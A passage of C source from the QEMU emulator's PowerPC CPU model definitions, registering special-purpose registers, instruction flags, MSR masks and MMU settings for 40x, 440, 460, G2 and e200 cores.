POWERPC_MMU_SOFT_4xx_Z; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } static void init_proc_403(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_403(env); gen_spr_403_real(env); init_excp_4xx_real(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(8, 12, 16, 20); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(403)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 403"; pcc->init_proc = init_proc_403; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_PE) | (1ull << MSR_PX) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_REAL; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_PX | POWERPC_FLAG_BUS_CLK; } static void init_proc_403GCX(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_403(env); gen_spr_403_real(env); gen_spr_403_mmu(env); /* Bus access control */ /* not emulated, as QEMU never does speculative access */ spr_register(env, SPR_40x_SGR, "SGR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0xFFFFFFFF); /* not emulated, as QEMU do not emulate caches */ spr_register(env, SPR_40x_DCWR, "DCWR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(8, 12, 16, 20); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(403GCX)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 403 GCX"; pcc->init_proc = init_proc_403GCX; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_PE) | (1ull << MSR_PX) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_4xx_Z; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_PX | POWERPC_FLAG_BUS_CLK; } static void init_proc_405(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_40x(env); gen_spr_405(env); /* Bus access control */ /* not emulated, as QEMU never does speculative access */ spr_register(env, SPR_40x_SGR, "SGR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0xFFFFFFFF); /* not emulated, as QEMU do not emulate caches */ spr_register(env, SPR_40x_DCWR, "DCWR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(8, 12, 16, 20); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(405)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 405"; pcc->init_proc = init_proc_405; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_405_MAC | PPC_40x_EXCP; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_SOFT_4xx; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_405; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } static void init_proc_440EP(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000000000FFFFULL); gen_spr_440(env); gen_spr_usprgh(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_MCSR, "MCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR0, "MCSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR1, "MCSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_CCR1, "CCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_BookE(env); env->dcache_line_size = 32; env->icache_line_size = 32; ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(20, 24, 28, 32); } POWERPC_FAMILY(440EP)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440 EP"; pcc->init_proc = init_proc_440EP; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FSEL | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_DCR | PPC_WRTEE | PPC_RFMCI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } POWERPC_FAMILY(460EX)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 460 EX"; pcc->init_proc = init_proc_440EP; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FSEL | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_DCR | PPC_DCRX | PPC_WRTEE | PPC_RFMCI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #if defined(TODO_USER_ONLY) static void init_proc_440GP(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000000000FFFFULL); gen_spr_440(env); gen_spr_usprgh(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_BookE(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* XXX: TODO: allocate internal IRQ controller */ SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(20, 24, 28, 32); } POWERPC_FAMILY(440GP)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440 GP"; pcc->init_proc = init_proc_440GP; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_DCRX | PPC_WRTEE | PPC_MFAPIDI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_TLBIVA | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #endif #if 0 static void init_proc_440x4(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000000000FFFFULL); gen_spr_440(env); gen_spr_usprgh(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_BookE(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* XXX: TODO: allocate internal IRQ controller */ SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(20, 24, 28, 32); } POWERPC_FAMILY(440x4)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440x4"; pcc->init_proc = init_proc_440x4; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #endif static void init_proc_440x5(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000000000FFFFULL); gen_spr_440(env); gen_spr_usprgh(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_MCSR, "MCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR0, "MCSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR1, "MCSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_CCR1, "CCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_BookE(env); env->dcache_line_size = 32; env->icache_line_size = 32; ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(20, 24, 28, 32); } POWERPC_FAMILY(440x5)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440x5"; pcc->init_proc = init_proc_440x5; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_RFMCI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } POWERPC_FAMILY(440x5wDFPU)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440x5 with double precision FPU"; pcc->init_proc = init_proc_440x5; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_FLOAT | PPC_FLOAT_FSQRT | PPC_FLOAT_STFIWX | PPC_DCR | PPC_WRTEE | PPC_RFMCI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->insns_flags2 = PPC2_FP_CVT_S64; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #if defined(TODO_USER_ONLY) static void init_proc_MPC5xx(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_5xx_8xx(env); gen_spr_5xx(env); init_excp_MPC5xx(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* XXX: TODO: allocate internal IRQ controller */ } POWERPC_FAMILY(MPC5xx)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "Freescale 5xx cores (aka RCPU)"; pcc->init_proc = init_proc_MPC5xx; pcc->check_pow = check_pow_none; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MEM_EIEIO | PPC_MEM_SYNC | PPC_CACHE_ICBI | PPC_FLOAT | PPC_FLOAT_STFIWX | PPC_MFTB; pcc->msr_mask = (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_REAL; pcc->excp_model = POWERPC_EXCP_603; pcc->bus_model = PPC_FLAGS_INPUT_RCPU; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } #endif #if defined(TODO_USER_ONLY) static void init_proc_MPC8xx(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_5xx_8xx(env); gen_spr_8xx(env); init_excp_MPC8xx(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* XXX: TODO: allocate internal IRQ controller */ } POWERPC_FAMILY(MPC8xx)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "Freescale 8xx cores (aka PowerQUICC)"; pcc->init_proc = init_proc_MPC8xx; pcc->check_pow = check_pow_none; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MEM_EIEIO | PPC_MEM_SYNC | PPC_CACHE_ICBI | PPC_MFTB; pcc->msr_mask = (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_MPC8xx; pcc->excp_model = POWERPC_EXCP_603; pcc->bus_model = PPC_FLAGS_INPUT_RCPU; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } #endif /* Freescale 82xx cores (aka PowerQUICC-II) */ static void init_proc_G2(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_G2_755(env); gen_spr_G2(env); /* Time base */ gen_tbl(env); /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation register */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_G2(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(G2)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC G2"; pcc->init_proc = init_proc_G2; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_AL) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_G2; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_G2LE(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_G2_755(env); gen_spr_G2(env); /* Time base */ gen_tbl(env); /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation register */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_G2(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(G2LE)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC G2LE"; pcc->init_proc = init_proc_G2LE; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_AL) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_G2; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_e200(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000070000FFFFULL); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_SPEFSCR, "SPEFSCR", &spr_read_spefscr, &spr_write_spefscr, &spr_read_spefscr, &spr_write_spefscr, 0x00000000); /* Memory management */ gen_spr_BookE206(env, 0x0000005D, NULL, 0); /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_ALTCTXCR, "ALTCTXCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_BUCSR, "BUCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_CTXCR, "CTXCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_DBCNT, "DBCNT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, 